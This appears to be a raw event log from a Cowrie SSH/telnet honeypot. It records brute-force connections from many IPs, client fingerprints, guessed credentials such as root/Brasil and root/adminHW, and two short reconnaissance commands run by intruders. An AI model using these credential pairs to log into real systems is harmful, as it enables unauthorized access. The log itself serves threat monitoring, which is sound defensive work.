{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:33:42.138363Z","src_ip":"212.227.125.160","session":"86e6f1115f98"}
{"eventid":"cowrie.session.closed","duration":180.11008644104004,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:33:42.142976Z","src_ip":"212.227.125.160","session":"86e6f1115f98"}
{"eventid":"cowrie.session.closed","duration":11.748852014541626,"message":"Connection lost after 11 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:33:42.189329Z","src_ip":"221.202.210.63","session":"19d0a4919042"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":45513,"dst_ip":"1.2.3.4","dst_port":23,"session":"14f75fa9fdd4","protocol":"telnet","message":"New connection: 221.202.210.63:45513 (1.2.3.4:23) [session: 14f75fa9fdd4]","sensor":"my-vps","timestamp":"2025-08-28T23:33:42.307176Z"}
{"eventid":"cowrie.session.connect","src_ip":"121.158.130.224","src_port":43556,"dst_ip":"1.2.3.4","dst_port":23,"session":"0d854cb038ce","protocol":"telnet","message":"New connection: 121.158.130.224:43556 (1.2.3.4:23) [session: 0d854cb038ce]","sensor":"my-vps","timestamp":"2025-08-28T23:33:47.434219Z"}
{"eventid":"cowrie.session.closed","duration":13.860887050628662,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:33:55.473892Z","src_ip":"221.202.210.63","session":"c54b775ecb03"}
{"eventid":"cowrie.session.closed","duration":13.172032833099365,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:33:55.479121Z","src_ip":"221.202.210.63","session":"14f75fa9fdd4"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":45732,"dst_ip":"1.2.3.4","dst_port":23,"session":"e8cddb44b644","protocol":"telnet","message":"New connection: 221.202.210.63:45732 (1.2.3.4:23) [session: e8cddb44b644]","sensor":"my-vps","timestamp":"2025-08-28T23:33:55.644608Z"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":45733,"dst_ip":"1.2.3.4","dst_port":23,"session":"b974d6d68938","protocol":"telnet","message":"New connection: 221.202.210.63:45733 (1.2.3.4:23) [session: b974d6d68938]","sensor":"my-vps","timestamp":"2025-08-28T23:33:55.646801Z"}
{"eventid":"cowrie.session.closed","duration":13.453056335449219,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:34:09.099790Z","src_ip":"221.202.210.63","session":"b974d6d68938"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":45930,"dst_ip":"1.2.3.4","dst_port":23,"session":"dc687e01413f","protocol":"telnet","message":"New connection: 221.202.210.63:45930 (1.2.3.4:23) [session: dc687e01413f]","sensor":"my-vps","timestamp":"2025-08-28T23:34:09.322204Z"}
{"eventid":"cowrie.session.closed","duration":13.815796375274658,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:34:09.460320Z","src_ip":"221.202.210.63","session":"e8cddb44b644"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":45933,"dst_ip":"1.2.3.4","dst_port":23,"session":"0b45ed79920e","protocol":"telnet","message":"New connection: 221.202.210.63:45933 (1.2.3.4:23) [session: 0b45ed79920e]","sensor":"my-vps","timestamp":"2025-08-28T23:34:09.738607Z"}
{"eventid":"cowrie.session.closed","duration":31.34658169746399,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:34:18.780731Z","src_ip":"121.158.130.224","session":"0d854cb038ce"}
{"eventid":"cowrie.session.closed","duration":13.042312860488892,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:34:22.364415Z","src_ip":"221.202.210.63","session":"dc687e01413f"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":46138,"dst_ip":"1.2.3.4","dst_port":23,"session":"f8c160d04b93","protocol":"telnet","message":"New connection: 221.202.210.63:46138 (1.2.3.4:23) [session: f8c160d04b93]","sensor":"my-vps","timestamp":"2025-08-28T23:34:22.615585Z"}
{"eventid":"cowrie.session.closed","duration":13.682539224624634,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:34:23.421076Z","src_ip":"221.202.210.63","session":"0b45ed79920e"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":46141,"dst_ip":"1.2.3.4","dst_port":23,"session":"f2bd504ec1ce","protocol":"telnet","message":"New connection: 221.202.210.63:46141 (1.2.3.4:23) [session: f2bd504ec1ce]","sensor":"my-vps","timestamp":"2025-08-28T23:34:23.570651Z"}
{"eventid":"cowrie.session.closed","duration":13.537725925445557,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:34:36.153243Z","src_ip":"221.202.210.63","session":"f8c160d04b93"}
{"eventid":"cowrie.session.closed","duration":13.473730325698853,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:34:37.044315Z","src_ip":"221.202.210.63","session":"f2bd504ec1ce"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":46352,"dst_ip":"1.2.3.4","dst_port":23,"session":"ba236dcdd690","protocol":"telnet","message":"New connection: 221.202.210.63:46352 (1.2.3.4:23) [session: ba236dcdd690]","sensor":"my-vps","timestamp":"2025-08-28T23:34:37.334317Z"}
{"eventid":"cowrie.session.closed","duration":12.815709352493286,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:34:50.149945Z","src_ip":"221.202.210.63","session":"ba236dcdd690"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":46590,"dst_ip":"1.2.3.4","dst_port":23,"session":"72a9f73f1e3c","protocol":"telnet","message":"New connection: 221.202.210.63:46590 (1.2.3.4:23) [session: 72a9f73f1e3c]","sensor":"my-vps","timestamp":"2025-08-28T23:34:50.291046Z"}
{"eventid":"cowrie.session.closed","duration":13.00157356262207,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:35:03.292548Z","src_ip":"221.202.210.63","session":"72a9f73f1e3c"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":46852,"dst_ip":"1.2.3.4","dst_port":23,"session":"e88eb5fa9820","protocol":"telnet","message":"New connection: 221.202.210.63:46852 (1.2.3.4:23) [session: e88eb5fa9820]","sensor":"my-vps","timestamp":"2025-08-28T23:35:03.463992Z"}
{"eventid":"cowrie.session.closed","duration":12.670889616012573,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:35:16.134790Z","src_ip":"221.202.210.63","session":"e88eb5fa9820"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":47057,"dst_ip":"1.2.3.4","dst_port":23,"session":"611132e151de","protocol":"telnet","message":"New connection: 221.202.210.63:47057 (1.2.3.4:23) [session: 611132e151de]","sensor":"my-vps","timestamp":"2025-08-28T23:35:16.336610Z"}
{"eventid":"cowrie.session.closed","duration":12.82512617111206,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:35:29.161668Z","src_ip":"221.202.210.63","session":"611132e151de"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":47250,"dst_ip":"1.2.3.4","dst_port":23,"session":"df68618efc64","protocol":"telnet","message":"New connection: 221.202.210.63:47250 (1.2.3.4:23) [session: df68618efc64]","sensor":"my-vps","timestamp":"2025-08-28T23:35:29.319145Z"}
{"eventid":"cowrie.session.closed","duration":12.951968669891357,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:35:42.271035Z","src_ip":"221.202.210.63","session":"df68618efc64"}
{"eventid":"cowrie.session.connect","src_ip":"221.202.210.63","src_port":47451,"dst_ip":"1.2.3.4","dst_port":23,"session":"05c54c1e33e0","protocol":"telnet","message":"New connection: 221.202.210.63:47451 (1.2.3.4:23) [session: 05c54c1e33e0]","sensor":"my-vps","timestamp":"2025-08-28T23:35:42.505110Z"}
{"eventid":"cowrie.session.closed","duration":12.588258266448975,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:35:55.093274Z","src_ip":"221.202.210.63","session":"05c54c1e33e0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51742,"dst_ip":"1.2.3.4","dst_port":22,"session":"822a64337ce0","protocol":"ssh","message":"New connection: 217.72.205.35:51742 (1.2.3.4:22) [session: 822a64337ce0]","sensor":"my-vps","timestamp":"2025-08-28T23:36:58.572580Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:36:58.573826Z","src_ip":"217.72.205.35","session":"822a64337ce0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43600,"dst_ip":"1.2.3.4","dst_port":22,"session":"258a1f169fbf","protocol":"ssh","message":"New connection: 212.227.125.160:43600 (1.2.3.4:22) [session: 258a1f169fbf]","sensor":"my-vps","timestamp":"2025-08-28T23:37:13.825449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:37:15.393259Z","src_ip":"212.227.125.160","session":"258a1f169fbf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:37:15.394025Z","src_ip":"212.227.125.160","session":"258a1f169fbf"}
{"eventid":"cowrie.login.success","username":"root","password":"Brasil","message":"login attempt [root/Brasil] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:37:21.917923Z","src_ip":"212.227.125.160","session":"258a1f169fbf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:37:24.255585Z","src_ip":"212.227.125.160","session":"258a1f169fbf"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-28T23:37:24.256294Z","src_ip":"212.227.125.160","session":"258a1f169fbf"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":5052,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b73b20fcca8","protocol":"ssh","message":"New connection: 80.94.95.15:5052 (1.2.3.4:22) [session: 5b73b20fcca8]","sensor":"my-vps","timestamp":"2025-08-28T23:37:25.864740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T23:37:25.865665Z","src_ip":"80.94.95.15","session":"5b73b20fcca8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:37:25.869575Z","src_ip":"212.227.125.160","session":"258a1f169fbf"}
{"eventid":"cowrie.session.closed","duration":"12.0","message":"Connection lost after 12.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:37:25.870481Z","src_ip":"212.227.125.160","session":"258a1f169fbf"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T23:37:25.916840Z","src_ip":"80.94.95.15","session":"5b73b20fcca8"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T23:37:26.254832Z","src_ip":"80.94.95.15","session":"5b73b20fcca8"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:37:27.317784Z","src_ip":"80.94.95.15","session":"5b73b20fcca8"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":49918,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc1a5063daa5","protocol":"ssh","message":"New connection: 201.148.180.50:49918 (1.2.3.4:22) [session: dc1a5063daa5]","sensor":"my-vps","timestamp":"2025-08-28T23:37:33.153208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:37:33.772602Z","src_ip":"201.148.180.50","session":"dc1a5063daa5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:37:33.773283Z","src_ip":"201.148.180.50","session":"dc1a5063daa5"}
{"eventid":"cowrie.login.success","username":"root","password":"Brasil","message":"login attempt [root/Brasil] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:37:39.554436Z","src_ip":"201.148.180.50","session":"dc1a5063daa5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:37:43.230477Z","src_ip":"201.148.180.50","session":"dc1a5063daa5"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-28T23:37:43.231185Z","src_ip":"201.148.180.50","session":"dc1a5063daa5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:37:44.268902Z","src_ip":"201.148.180.50","session":"dc1a5063daa5"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:37:44.270030Z","src_ip":"201.148.180.50","session":"dc1a5063daa5"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.133.145","src_port":57882,"dst_ip":"1.2.3.4","dst_port":22,"session":"96626ae05b8a","protocol":"ssh","message":"New connection: 14.103.133.145:57882 (1.2.3.4:22) [session: 96626ae05b8a]","sensor":"my-vps","timestamp":"2025-08-28T23:38:36.195294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:38:36.196608Z","src_ip":"14.103.133.145","session":"96626ae05b8a"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T23:38:36.393607Z","src_ip":"14.103.133.145","session":"96626ae05b8a"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.189.193","src_port":43420,"dst_ip":"1.2.3.4","dst_port":22,"session":"33298d31f4ac","protocol":"ssh","message":"New connection: 45.159.189.193:43420 (1.2.3.4:22) [session: 33298d31f4ac]","sensor":"my-vps","timestamp":"2025-08-28T23:40:36.206148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:40:36.207256Z","src_ip":"45.159.189.193","session":"33298d31f4ac"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:40:36.207987Z","src_ip":"14.103.133.145","session":"96626ae05b8a"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T23:40:36.226409Z","src_ip":"45.159.189.193","session":"33298d31f4ac"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:40:36.314392Z","src_ip":"45.159.189.193","session":"33298d31f4ac"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:40:36.333309Z","src_ip":"45.159.189.193","session":"33298d31f4ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52060,"dst_ip":"1.2.3.4","dst_port":23,"session":"1b90bbfb728a","protocol":"telnet","message":"New connection: 212.227.235.229:52060 (1.2.3.4:23) [session: 1b90bbfb728a]","sensor":"my-vps","timestamp":"2025-08-28T23:41:18.032554Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:41:18.220683Z","src_ip":"212.227.235.229","session":"1b90bbfb728a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:41:18.238160Z","src_ip":"212.227.235.229","session":"1b90bbfb728a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57956,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e8b7a725b1c","protocol":"ssh","message":"New connection: 212.227.125.160:57956 (1.2.3.4:22) [session: 6e8b7a725b1c]","sensor":"my-vps","timestamp":"2025-08-28T23:41:29.684050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:41:29.684977Z","src_ip":"212.227.125.160","session":"6e8b7a725b1c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T23:41:29.734821Z","src_ip":"212.227.125.160","session":"6e8b7a725b1c"}
{"eventid":"cowrie.login.failed","username":"sol","password":"123","message":"login attempt [sol/123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:41:29.891784Z","src_ip":"212.227.125.160","session":"6e8b7a725b1c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:41:30.945128Z","src_ip":"212.227.125.160","session":"6e8b7a725b1c"}
